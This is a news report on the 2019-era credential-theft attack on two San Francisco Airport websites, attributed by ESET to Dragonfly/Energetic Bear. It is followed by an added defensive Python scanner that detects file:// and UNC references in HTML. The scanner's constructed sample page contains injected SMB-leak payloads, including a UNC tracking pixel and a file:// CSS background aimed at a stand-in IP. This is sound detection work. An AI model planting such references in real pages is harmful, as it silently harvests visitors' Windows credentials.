San Francisco International Airport (SFO) has just disclosed that some users of its websites may have had their logins stolen after a cyber-attack last month.
The airport revealed that its SFOConnect.com and SFOConstruction.com sites came under attack during March.
The first site appears to be a general-purpose information site for employees and passengers, whilst the other covers projects, bids and contracts related to the airport.
Attackers
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials. Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the breach notice explained.
“What information was involved? At this time, it appears the attackers may have accessed the impacted users’ usernames and passwords used to log on to those personal devices.”
Offline
The airport took the affected websites offline following the incident and ordered a reset of all SFO-related email and network passwords on March 23. The malicious code has also, it seems, been removed.
However, those who were possibly affected were strongly encouraged to act.
Password
“If you visited either website outside of SFO’s managed networks and using Internet Explorer on a Windows-based device, you should change the password you use to log in to that device,” the airport warned. “You should also consider changing any credentials that use the same username and password combination.”
Employees
Colin Bastable, CEO of cyber-training and awareness firm Lucy Security, suggested that SFO may have been compromised by employees who were using work credentials on sites that were subsequently breached.
“From a cursory glance in the darker corners of the web, I think the biggest risk to flysfo.com is from their employees using official email addresses for personal business on sites like Zynga and Myfitnesspal.com,” he commented.
Malicious
“I also found around 8,000 compromised credentials from late February featuring a couple of flysfo.com email addresses. Perhaps one of these opened the door, allowing the malicious code to be dropped in the SFO websites.”
The SFO Construction site apparently remains under maintenance, but the other site seems to be back up and running.
Message
All of which sends the strong message that even major players should not be complacent.
Update – April 15th – Russian Group responsible?
An Eset revelation in a social media post yesterday claimed that the incident was “in line with the TTPs of an APT group known as Dragonfly/Energetic Bear.” This is, of course, a Russian group.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” it explained.
Eset also quashed rumours that the attack had been actioned by Magecart digital skimming hackers.
“The targeted information was NOT the visitor’s credentials to the compromised websites, but rather the visitor’s own Windows credentials,” it was explained.
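The Eset explanation above describes injected page content that points a visitor's browser at an SMB share, so that Internet Explorer on Windows attempts an SMB connection and automatically sends the user's Windows username and NTLM hash. From a defender's side, the thing to look for in served pages is exactly that kind of reference: a `file://` URL or a UNC path (`\\host\share`) in any attribute or CSS rule that makes the browser fetch a resource. The following scanner is an added example written for this article; it is not code from SFO, Eset or the original post. The sample HTML, the `203.0.113.10` address (a documentation-range IP) and the function and class names are all constructed for the illustration.

```python
"""Scan HTML for file:// and UNC references that would make Internet Explorer
attempt an SMB connection (and leak NTLM credentials) to a remote host.

Added example for the SFO article; the sample page and the address
203.0.113.10 are constructed, not taken from the incident.
"""
import re
from html.parser import HTMLParser

# Attributes that cause a browser to fetch or navigate to a URL.
URL_ATTRS = {"src", "href", "action", "data", "poster", "background", "formaction"}

# A value starting with the file: scheme, or a backslash UNC path such as
# \\host\share\file.  Plain https:// and site-relative paths are not flagged.
SUSPICIOUS = re.compile(r"^\s*(file:|\\\\[^\\\s]+\\)", re.IGNORECASE)

# url(...) tokens inside stylesheets and inline style attributes.
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)


class SmbLeakFinder(HTMLParser):
    """Collect (tag, attribute, value, line) for every suspicious reference."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            if value is None:
                continue
            if name.lower() in URL_ATTRS and SUSPICIOUS.search(value):
                self.findings.append((tag, name.lower(), value, self.getpos()[0]))
            if name.lower() == "style":  # inline CSS can also carry url(...)
                self._scan_css(tag, value)

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # HTMLParser hands the whole <style> body to handle_data in one call.
        if self._in_style:
            self._scan_css("style", data)

    def _scan_css(self, tag, css):
        for match in CSS_URL.finditer(css):
            if SUSPICIOUS.search(match.group(1)):
                self.findings.append((tag, "css-url", match.group(1), self.getpos()[0]))


def find_smb_leak_references(html):
    """Return the list of suspicious references found in the given HTML."""
    parser = SmbLeakFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: two legitimate resources plus three injected ones.
SAMPLE_HTML = r"""<html><head>
<link rel="stylesheet" href="/static/site.css">
<script src="https://cdn.example.test/app.js"></script>
<style>body { background: url(file://203.0.113.10/share/bg.png); }</style>
</head><body>
<img src="/images/logo.png">
<img src="\\203.0.113.10\share\pixel.gif" width="1" height="1">
<a href="file:///C:/Users/Public/readme.txt">docs</a>
</body></html>"""


if __name__ == "__main__":
    for tag, attr, value, line in find_smb_leak_references(SAMPLE_HTML):
        print(f"line {line}: <{tag} {attr}> -> {value}")
```

Running the scanner over the constructed page reports the stylesheet `url(file://...)`, the one-pixel image pointing at a UNC path, and the `file:` link, while the CDN script and site-relative resources pass. Such a check belongs in a content-integrity job that fetches the site's own pages from outside the corporate network, since that is where the affected SFO visitors were. The network-side counterpart is to block outbound TCP/445 at the perimeter so that a browser coerced into an SMB connection cannot reach an Internet host in the first place.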